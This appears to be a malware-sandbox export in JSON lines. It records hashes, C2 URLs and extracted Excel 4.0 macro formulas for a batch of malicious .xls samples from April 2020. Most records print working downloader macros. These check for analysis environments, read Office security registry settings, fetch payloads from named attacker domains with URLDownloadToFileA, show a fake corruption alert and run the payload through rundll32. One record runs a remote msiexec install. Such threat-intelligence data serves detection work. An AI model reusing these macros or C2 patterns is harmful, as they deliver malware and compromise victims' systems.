/y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0QMfDlcnSa\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98556158c50842d870cf5bcbf5a95848ca6951d1ccc91f2080fdb8cc5b1eab97"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98556158c50842d870cf5bcbf5a95848ca6951d1ccc91f2080fdb8cc5b1eab97","filesize":152576,"md5":"7251195ce2a550b85702839c4e335456","sha1":"d5e633bb129d1cf1bc6ec2900053c66d68087f12","sha256":"98556158c50842d870cf5bcbf5a95848ca6951d1ccc91f2080fdb8cc5b1eab97","sha512":"67546d8af9be63c377c1102d0423f22098e1b2eb43b406495aac7d406e43576ac1e5593cec8af47c482e52980e03d0de0628286d11194707379bcfbd9323ea69","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98556158c50842d870cf5bcbf5a95848ca6951d1ccc91f2080fdb8cc5b1eab97.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sBCxXpUAsv\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"987f5096284893859492abf80675c99e6d4e1414265207978adf178d18a6651c"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"987f5096284893859492abf80675c99e6d4e1414265207978adf178d18a6651c","filesize":170496,"md5":"bd277c7a06baccc9ebea45f1cd330913","sha1":"b523ee26b4f06fbda9d5219b29c6334f5eeab98a","sha256":"987f5096284893859492abf80675c99e6d4e1414265207978adf178d18a6651c","sha512":"58f7193c6fa1fbd7dcd70912b71cab1f3b63f23d2f2aa77026d3034c0a111797bcfa7089844f0068a993fed27bde05bb6a27532a96d688a2aaae1197bb0f986c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"987f5096284893859492abf80675c99e6d4e1414265207978adf178d18a6651c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8JYUJGr1ss\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98892a7da37d9b87668a359db69edffdafb9fa09625daab5c861f126a591d9b5"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98892a7da37d9b87668a359db69edffdafb9fa09625daab5c861f126a591d9b5","filesize":112128,"md5":"ee04fda7a150a28a631f386b929ab75c","sha1":"ccd15edcdb5582d3b7628b06d8a729ebebf1f2d9","sha256":"98892a7da37d9b87668a359db69edffdafb9fa09625daab5c861f126a591d9b5","sha512":"9e6c644d13d32026227ec5b0118d719f2afe17f74ab31bb2c83e4a5468918635b639e0e5ca1665332dc4927b83ba6804cf2b015c332d4caacb05eed29759e527","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98892a7da37d9b87668a359db69edffdafb9fa09625daab5c861f126a591d9b5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9896710ba24af14bff01a2cd9adb6811b5f81b403eb9b0eb4d0de4618982dfac"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"9896710ba24af14bff01a2cd9adb6811b5f81b403eb9b0eb4d0de4618982dfac","filesize":167936,"md5":"8d9f100fba291c34691ee7a2cc6897d9","sha1":"d25177b91c60e4642b9029978002d4aabba17190","sha256":"9896710ba24af14bff01a2cd9adb6811b5f81b403eb9b0eb4d0de4618982dfac","sha512":"95a3e8ab512460c9469edd4ce02dc602262398021b98e769810f0cfc66e9d5e2202bffd23efb9cf1c6cdc88af66640433d9a60888cb5151b14e089d642b793d1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9896710ba24af14bff01a2cd9adb6811b5f81b403eb9b0eb4d0de4618982dfac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gGo5rfcHQu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"989ec2471a93861fb333d90ed347646aedfc106adf13d1acdbca2bf32293f51e"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"989ec2471a93861fb333d90ed347646aedfc106adf13d1acdbca2bf32293f51e","filesize":206336,"md5":"032a16a8740cb3debf85eb03ca218d55","sha1":"6c4d853e85e29402dd89d86fa44018fe494c3745","sha256":"989ec2471a93861fb333d90ed347646aedfc106adf13d1acdbca2bf32293f51e","sha512":"000cd63e3bfe3ffd543150b3a5ee383289229e462eb678e9c8b97e35a1d2c8c882e077429d1afdb9c25677f12b980c86c358547b05a2478cc41cead0a22e065b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"989ec2471a93861fb333d90ed347646aedfc106adf13d1acdbca2bf32293f51e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"n4bL80tnId\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98b7763d6f3ab92dc5e5fe61ea568b24736b0f03aac1f5a2f3444f661bc6f4e3"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98b7763d6f3ab92dc5e5fe61ea568b24736b0f03aac1f5a2f3444f661bc6f4e3","filesize":226304,"md5":"76f309587b99c3cf9b452769fac46906","sha1":"f8ae1222b6b55d8ca9b9001b1d3bb07ad1643a03","sha256":"98b7763d6f3ab92dc5e5fe61ea568b24736b0f03aac1f5a2f3444f661bc6f4e3","sha512":"614a2d7525de366e40ca00705681b6ef54789aa00cbacd5910256217934eafe65d38f7eaf18e23d6df25ad65ce95dcecde2e5833a31dcf1969bb86f2034b89e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98b7763d6f3ab92dc5e5fe61ea568b24736b0f03aac1f5a2f3444f661bc6f4e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dK9ONtvIzJ\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98b9b4c8fb7e6863bef769321998b611b232eaf0bf4f8057f12ae773a6b9d05a"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98b9b4c8fb7e6863bef769321998b611b232eaf0bf4f8057f12ae773a6b9d05a","filesize":185344,"md5":"c5d8ae98690291d332a8a1095473dd27","sha1":"a36ae3595ec93b4db36d02063551cad3ac5e5b54","sha256":"98b9b4c8fb7e6863bef769321998b611b232eaf0bf4f8057f12ae773a6b9d05a","sha512":"7990d5850b5a0b2ab5ee0cf6b6983012c4e4dbf5e538f5d2e477f3db42b061f1086cc3c784632b643e5ce47b521866e8e54c3693a095239a5657fb7d43f65ed3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98b9b4c8fb7e6863bef769321998b611b232eaf0bf4f8057f12ae773a6b9d05a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98cea0516a5b530cfe8141ce9acb780dfc15e34b3388c58f23561ecc182e66db"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98cea0516a5b530cfe8141ce9acb780dfc15e34b3388c58f23561ecc182e66db","filesize":167936,"md5":"6ecc96f4d1cbdc89ee1a812145f84bc4","sha1":"035ff87e95c17dd70fcd0c3aea3066c5d3527abc","sha256":"98cea0516a5b530cfe8141ce9acb780dfc15e34b3388c58f23561ecc182e66db","sha512":"b517875b277a272400533f8bfed0baec451536214a2b356a9c3398cb4d6c9cc7f8e3abbbc19b3cd56227993b3bc0e713c707e8c198110e43e7d74d822f6b0f49","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98cea0516a5b530cfe8141ce9acb780dfc15e34b3388c58f23561ecc182e66db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4WB9im9aqf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98d682a500abc3a638bed0f23479c82e5baf03fae045b980539b1dbed47ec4e0"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98d682a500abc3a638bed0f23479c82e5baf03fae045b980539b1dbed47ec4e0","filesize":170496,"md5":"e1dbf19d4964952b5eec985c3a68bf79","sha1":"0ba5f9cb2ea57722f76359c0112e7c2f4b2878ca","sha256":"98d682a500abc3a638bed0f23479c82e5baf03fae045b980539b1dbed47ec4e0","sha512":"78e317748995a8d5d70cf93171f567dca274163a36b77df44cf5fcb50960cac780ee15638682b421a958b19e461cbdc8dc1201d927e5608b073c4f7476f2661f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98d682a500abc3a638bed0f23479c82e5baf03fae045b980539b1dbed47ec4e0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cz1PClXXZQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98e30cc7ca1bf6566f02920503042e0d94b31a5fb276d612f0494277a00bf531"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98e30cc7ca1bf6566f02920503042e0d94b31a5fb276d612f0494277a00bf531","filesize":185344,"md5":"3d74b866a132a0c9ba3475c7b31871b9","sha1":"5d6b61e94345782752af5ccaacb5c657fcb83deb","sha256":"98e30cc7ca1bf6566f02920503042e0d94b31a5fb276d612f0494277a00bf531","sha512":"f43a38c80ab66bd08eab58c44067708ece403b5b998f83f30cfaf5bbfdea65ec8e792152f2b0486bb385a534490705212e22911c1c38e011b654976bfa2586ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98e30cc7ca1bf6566f02920503042e0d94b31a5fb276d612f0494277a00bf531.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98e3301c6e1ac98c22472e457471bae4bcea03356324c035ae66bfdfe8312f32"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98e3301c6e1ac98c22472e457471bae4bcea03356324c035ae66bfdfe8312f32","filesize":116224,"md5":"de2d31420aa043f0b0e704841a8fdcfb","sha1":"14c5435a1f6dbe5bd6da8c9381cd0eec6336c9e6","sha256":"98e3301c6e1ac98c22472e457471bae4bcea03356324c035ae66bfdfe8312f32","sha512":"6181f02e99c2ffe0406968f73b1cb6aedc738c02f8670bc446cc4c4c3bbbf23d82186b5617fd3f4c5d0f7dab6010507eed36dd064b41dd98ee3fdf5f2dc1f8e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98e3301c6e1ac98c22472e457471bae4bcea03356324c035ae66bfdfe8312f32.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CvaHJ31w0l\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526","filesize":184320,"md5":"e84f6742f566ccaa285c4f2b8d20a77c","sha1":"f7f5625d3afd125e2327479eed2434a7d3fced4a","sha256":"98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526","sha512":"837f0c96e05339cb230f896d319becb665ced0014114184cd17d92108017ea607698cad9691923e3defe3a8a8636a33dde07fea809eefe9b1ddb393784234468","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"msiexec.exe serf=19 skip=1 /i http://office365advance.com/update /q OnStart='c:\\windows\\notepad.exe'\")\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98fbe0cf38b94635bd1af59d125d974cbf0bed508743e134f73737fb7d0ddf09"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"98fbe0cf38b94635bd1af59d125d974cbf0bed508743e134f73737fb7d0ddf09","filesize":168448,"md5":"6479f7b138fa9296b80010f7c81b0d42","sha1":"e81df63af61af67dc059f24461d551629578dc86","sha256":"98fbe0cf38b94635bd1af59d125d974cbf0bed508743e134f73737fb7d0ddf09","sha512":"c9c2d911500a83c9d187569654867659201ae41a480d6a693a80c68a1f6ab0099c84c47e84bf50d3929e6d2d69c4dd5b145c85e427c79d45b0f4191734f0ba1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98fbe0cf38b94635bd1af59d125d974cbf0bed508743e134f73737fb7d0ddf09.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VveWkOwnmD\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"99076cac918818b05e5833b49d6753ca8d91677259c4722baed7487039c91c49"},"analysis":{"reported":"2020-04-09T16:17:53Z","score":10},"files":[{"filename":"99076cac918818b05e5833b49d6753ca8d91677259c4722baed7487039c91c49","filesize":167936,"md5":"ad595b5af9aacccb44c2f233c8bc7106","sha1":"d983d730cad9ed8336b6de20b0ab51e126111c49","sha256":"99076cac918818b05e5833b49d6753ca8d91677259c4722baed7487039c91c49","sha512":"0bb928cf327b0f2c13b4c4de22e4acda997efa6c55a0d95378470604e94433a68fbf92e37c9577722c571b8f8c140630991641e70d566587cf47f0545cac2d6a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"99076cac918818b05e5833b49d6753ca8d91677259c4722baed7487039c91c49.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZLDB0L1w8k\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"991ac2d07a599fddb78cdd612853364ff11538e3c155b404319859be032fe1dd"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"991ac2d07a599fddb78cdd612853364ff11538e3c155b404319859be032fe1dd","filesize":206336,"md5":"a8aee94a8c46a84ffdbd7293e0aee54c","sha1":"c0f9809437596a5a3d526a1ed9d601d1ba34e7cf","sha256":"991ac2d07a599fddb78cdd612853364ff11538e3c155b404319859be032fe1dd","sha512":"1f5cf6d68c2d2341d02d8778d09ef08748a45593940cc30370f9e05d5f943fe9425b4009cfde791bbfc4b8f049f586c95d8c37f3fa31f8b682c99c01fa9fdd0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"991ac2d07a599fddb78cdd612853364ff11538e3c155b404319859be032fe1dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ce4h0edvfA\",TRUE)\nGOTO(R$0C$18)"}}}]}
